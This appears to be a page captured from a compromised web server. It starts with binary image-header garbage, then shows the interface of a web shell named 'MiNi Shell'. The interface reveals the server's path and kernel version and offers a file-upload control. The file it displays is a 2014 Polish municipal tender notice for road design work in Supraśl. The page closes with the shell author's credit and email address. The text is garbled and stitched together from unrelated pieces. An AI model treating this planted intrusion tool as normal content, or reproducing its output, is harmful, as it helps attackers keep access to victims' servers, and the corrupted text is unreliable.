JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140219/57618-N-2014.html

<p class="kh_header"><b>Supraśl: WYKONANIE DOKUMENTACJI PROJEKTOWEJ:
CZĘŚĆ I - WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ ULICY RYBACKIEJ W SOBOLEWIE
CZĘŚĆ II -  WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ ULICY GÓRKA TOMKA W ZAŚCIANKACH</b><br>
<b>Numer ogłoszenia: 57618 - 2014; data zamieszczenia: 19.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Supraśl , ul. Piłsudskiego 58, 16-030 Supraśl, woj. podlaskie, tel. 085 7132725, 7132701, faks 085 7132720, 7132725.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.suprasl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE DOKUMENTACJI PROJEKTOWEJ:
CZĘŚĆ I - WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ ULICY RYBACKIEJ W SOBOLEWIE
CZĘŚĆ II -  WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ ULICY GÓRKA TOMKA W ZAŚCIANKACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowo - kosztorysowej: 
1)	budowy ulicy Rybackiej w Sobolewie - długość ok. 1300 mb (od ulicy Stawowej do ulicy Podlaskiej), nawierzchnia asfaltowa, szer. 6,0 mb z jednostronnym chodnikiem i wjazdami wraz z niezbędną infrastrukturą: tj. kanalizacja sanitarna i wodociąg- należy zaprojektować elementy sieci prowadzące do dróg bocznych, kanał deszczowy oraz ewentualne inne projekty w przypadku wystąpienia takiej potrzeby,. Należy przygotować niezbędne materiały do złożenia wniosku do wydania decyzji o lokalizacji celu publicznego oraz do decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia.
2)	budowy ulicy Górka Tomka w Zaściankach-  odcinek od torów PKP do istniejącej nawierzchni na wysokości działki geod. nr 39/2- długość ok. 350 mb- droga o symbolu KD 011L wg obowiązującego miejscowego planu zagospodarowania przestrzennego. Szerokość jezdni 6,0 mb z obustronnymi chodnikami i wjazdami, na odcinku dz. geod. nr 38/1 zatoka postojowa. Należy wykonać projekt wraz z infrastrukturą podziemną. (projekty wykonawcze: kanalizacja sanitarna i wodociąg- należy zaprojektować elementy sieci prowadzące do dróg bocznych; kanał deszczowy- w ulicy z wykorzystaniem istniejącego odpływu do rowu w okolicy torów PKP, ewentualne inne projekty w przypadku wystąpienia takiej potrzeby)
Załącznik nr 7 (mapki) do niniejszej SIWZ przedstawia graficznie zakres poszczególnych ulic.
2.	Dokumentację  należy opracować zgodnie z przepisami ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. z 2012 r.,  poz. 647 z późn. ), zgodnie z przepisami ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz. U.  z 2013 r., poz. 260, z późn. zm.). Powinna ona spełniać warunki wynikające z obowiązujących przepisów prawa w szczególności Prawa budowlanego i Prawa zamówień publicznych oraz winna być wykonana zgodnie z normami i zasadami wiedzy technicznej. Złożona dokumentacja winna odpowiadać aktualnemu stanowi prawnemu na dzień złożenia wniosku o wydanie pozwolenia na budowę, winna zawierać wszystkie wymagane uzgodnienia, opinie niezbędne do uzyskania pozwolenia na budowę. Proponowane rozwiązania oraz ewentualne warianty rozwiązań projektowych należy uzgadniać z Zamawiającym.
3.	Zakres opracowania dotyczącego dokumentacji projektowej obejmuje:
1)	wykonanie badań i pomiarów w zakresie : 
a)	ustalenia  geotechnicznych  warunków  posadowienia  w  oparciu  o  wszystkie   obowiązujące w tym zakresie przepisy prawne,
b)	wykonania map sytuacyjno-wysokościowych dla celów projektowych w skali l : 1000 lub    1 : 500 z geodezyjną inwentaryzacją szaty roślinnej, 
c)	 pozyskania wypisów i wyrysów z mapy ewidencyjnej gruntów dla obszarów   przeznaczonych pod inwestycję i obszarów, na które ta inwestycja będzie oddziaływać, 
2)	opracowanie kompletnego projektu budowlanego wraz z uzyskaniem opinii, uzgodnień i zatwierdzeń, a w tym:                 
a)	wykonanie projektu zagospodarowania terenu ( z uzgodnieniami), 
b)	 wykonanie projektu budowlanego ( z uzgodnieniami),
c)	wykonanie informacji dotyczących bezpieczeństwa i ochrony zdrowia,
3)	opracowanie projektu wykonawczego obejmującego część opisową i rysunkową, a w tym: 
a)	projekt zagospodarowania terenu, 
b)	projekty wykonawcze branżowe sporządzone oddzielnie dla każdej branży,
c)	projekty stałej organizacji ruchu,
d)	projekty niezbędnych  przebudów,  przekładek  i  odtworzeń  istniejących  obiektów uzbrojenia i urządzenia terenu,
e)	szczegółowe parametry techniczne obiektów,  instalacji  oraz  urządzeń  związanych    z projektowanymi obiektami umożliwiające wykonawcom robót budowlanych ich dobranie,
f)	inne  niezbędne  opracowania  i  badania  pozwalające  na  kompleksową  i  prawidłową realizację przedsięwzięcia,
g)	oświadczenie o kompletności dokumentacji.  
4.	Zakres dokumentacji kosztorysowej:
1)	przedmiary robót, które winny być opracowane oddzielnie dla każdego projektu zawierające: 
a)	opis robót w kolejności technologicznej ich wykonania, 
b)	odniesienie do specyfikacji Technicznych Wykonania  i Odbioru  Robót  Budowlanych,
c)	podstawy do ustalania cen jednostkowych nakładów rzeczowych z podaniem ilości jednostek przedmiarowych robót zgodnie z założeniami wyjściowymi do kosztorysowania uzgodnionymi z Zamawiającym. 
2)	kosztorysy  inwestorskie,  które winny  być  opracowane  oddzielnie  dla  każdego projektu branżowego. Kosztorysy inwestorskie winny być  opracowane  zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz.1389) oraz zgodnie z ustawy  z dnia 29 stycznia 2004 r. - Prawo zamówień  publicznych  ( Dz. U. z  2013 r.,  poz. 907 z późn. zm.), 
3)	specyfikacje  Techniczne Wykonania  i Odbioru  Robót  Budowlanych (STWIORB)  opracowane zgodnie  z  rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu  i  formy  dokumentacji  projektowej,  specyfikacji  technicznych wykonania  i  odbioru robót budowlanych  oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 r., poz. 1129) i zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, a w  szczególności wymagań  w  odniesieniu  do  właściwości materiałów, sposobu wykonania robót, oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac,
4)	założenia wyjściowe  do  kosztorysowania  zawierające  dane  techniczne,  technologiczne   i organizacyjne  nie  określone  w  dokumentacji  projektowej  i  Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych a mające wpływ na wysokość wartości kosztorysowej robót budowlanych oraz inne opracowania wymienione w art. 20 ustawy z  dnia  7 lipca 1994  r. - Prawo Budowlane ( Dz. U.  z  2013  r.,  poz. 1409  z późn. zm.),  a  także  te,  które pozwolą  na  kompleksową  i  prawidłową realizację przedsięwzięcia inwestycyjnego.
5.	Ilość i format sporządzonych dokumentów:
1)	projekt budowlany i wykonawczy - w 5  egzemplarzach plus jedna kopia na nośniku elektronicznym w formacie pdf,
2)	przedmiary i kosztorysy inwestorskie - w  2  egzemplarzach plus jedna kopia na nośniku elektronicznym w formacie pdf, doc.,
3)	specyfikacje Techniczne Wykonania  i Odbioru Robót Budowlanych - w 2 egzemplarzach plus jedna kopia na nośniku elektronicznym w formacie pdf, doc.,
4)	mapy sytuacyjno  - wysokościowe - w 2 egzemplarzach  (z oryginalnymi pieczęciami).

6.	Zamawiający wymaga udzielenia co najmniej 3-letniej gwarancji na wykonane prace..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie Wykonawcy zamówień uzupełniających, polegających na powtórzeniu tego samego rodzaju zamówień. Zamówienia uzupełniające będą stanowiły nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi byc zabezpieczona wadium w wysokości: 
- część I- 500,00 zł ( słownie: pięćset zlotych),
- część II- 500,00 zł (slownie: pięćset zlotych).
Wadium moze byc wniesione w jednej lub kilku nastepujacych formach:
- pieniadzu,
- poręczeniach bankowych lub poreczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pienieznym,
- gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poreczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 200 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm). Wadium wnoszone w pieniadzu wpłaca się przelewem. Wykonawca dołącza do oferty kserokopię wpłaty z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: Wadium - przetarg na Wykonanie dokumentacji projektowej na budowę ...................... część ...................................
Wadiuj wnoszone w pieniądzu należy wpłacić na konto zamawiającego w Banku Spółdzielczym Oddział w Supraślu, rach. nr 72 8060 0004 0680 0130 2000 0040.. Wadium nalezy wpłacić nie póxniej niż do dnia 28.02.2014r. do godz. 11.00. Za zachowanie terminu do wniesienia wadium uważa się wpływ wadium na konto Zamawiającego najpóźniej w terminie wskazanym powyżej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, na podstawie oświadczenia (wzór Załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie), wykonał co najmniej 2 zamówienia odpowiadające swoim rodzajem i  wartością  usłudze stanowiącej przedmiot zamówienia,  tj. wykonanie dokumentacji   projektowej  na : remont, przebudowę lub budowę ulicy o wartości nie mniejszej niż 30 000,00 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
dysponuje lub będzie dysponował osobami do projektowania posiadającymi doświadczenie, wykształcenie, kwalifikacje zawodowe i uprawnienia wymagane przepisami ustawy Prawo budowlane, niezbędne do wykonania zamówienia. 
Wymaga się dysponowania co najmniej po jednej osobie posiadającej uprawnienia do projektowania w specjalności drogowej oraz  w specjalności sanitarnej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu o  których mowa w art. 22 ust. 1 ustawy (wg wzoru Załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy, 2. Pełnomocnictwo: w przypadku, gdy wykonawcy ubiegają  się  wspólnie o udzielenie zamówienia oraz w przypadku, gdy osoba reprezentująca podmiot działa w oparciu o pełnomocnictwo, 3.Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, gdy wykonawca wykazuje się wiedzą, doświadczeniem, osobami lub zdolnościami finansowymi innych podmiotów,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Strony przewidują możliwość wprowadzenie istotnych zmian niniejszej umowy, w stosunku do treści oferty, na podstawie  której dokonano wyboru Wykonawcy - w następujących przypadkach:
1)	gdy konieczność wprowadzenia takich zmian wyniknie w rezultacie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, przy zachowaniu należytej staranności, a w tym z powodu siły wyższej nie pozwalającej na realizację umowy,
2)	ponadprzeciętnego czasu trwania procedur administracyjnych, mającego wpływ na termin wykonania zobowiązania i nie wynikającego z przyczyn leżących po stronie Wykonawcy,
3)	 gdy wprowadzenie zmian będzie korzystne dla Zamawiającego,
4)	gdy konieczność wprowadzenia zmian wynika z okoliczności, za które odpowiedzialność ponosi Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.suprasl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Supraślu, ul. Piłsudskiego 58, 16-030 Supraśl, pok. nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2014 godzina 11:00, miejsce: Urząd Miejski w Supraślu, ul. Piłsudskiego 58, 16-030 Supraśl, pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I - WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ ULICY RYBACKIEJ W SOBOLEWIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowo - kosztorysowej: 
1)	budowy ulicy Rybackiej w Sobolewie - długość ok. 1300 mb (od ulicy Stawowej do ulicy Podlaskiej), nawierzchnia asfaltowa, szer. 6,0 mb z jednostronnym chodnikiem i wjazdami wraz z niezbędną infrastrukturą: tj. kanalizacja sanitarna i wodociąg- należy zaprojektować elementy sieci prowadzące do dróg bocznych, kanał deszczowy oraz ewentualne inne projekty w przypadku wystąpienia takiej potrzeby,. Należy przygotować niezbędne materiały do złożenia wniosku do wydania decyzji o lokalizacji celu publicznego oraz do decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II -  WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ ULICY GÓRKA TOMKA W ZAŚCIANKACH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowo - kosztorysowej: 
2)	budowy ulicy Górka Tomka w Zaściankach-  odcinek od torów PKP do istniejącej nawierzchni na wysokości działki geod. nr 39/2- długość ok. 350 mb- droga o symbolu KD 011L wg obowiązującego miejscowego planu zagospodarowania przestrzennego. Szerokość jezdni 6,0 mb z obustronnymi chodnikami i wjazdami, na odcinku dz. geod. nr 38/1 zatoka postojowa. Należy wykonać projekt wraz z infrastrukturą podziemną. (projekty wykonawcze: kanalizacja sanitarna i wodociąg- należy zaprojektować elementy sieci prowadzące do dróg bocznych; kanał deszczowy- w ulicy z wykorzystaniem istniejącego odpływu do rowu w okolicy torów PKP, ewentualne inne projekty w przypadku wystąpienia takiej potrzeby).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com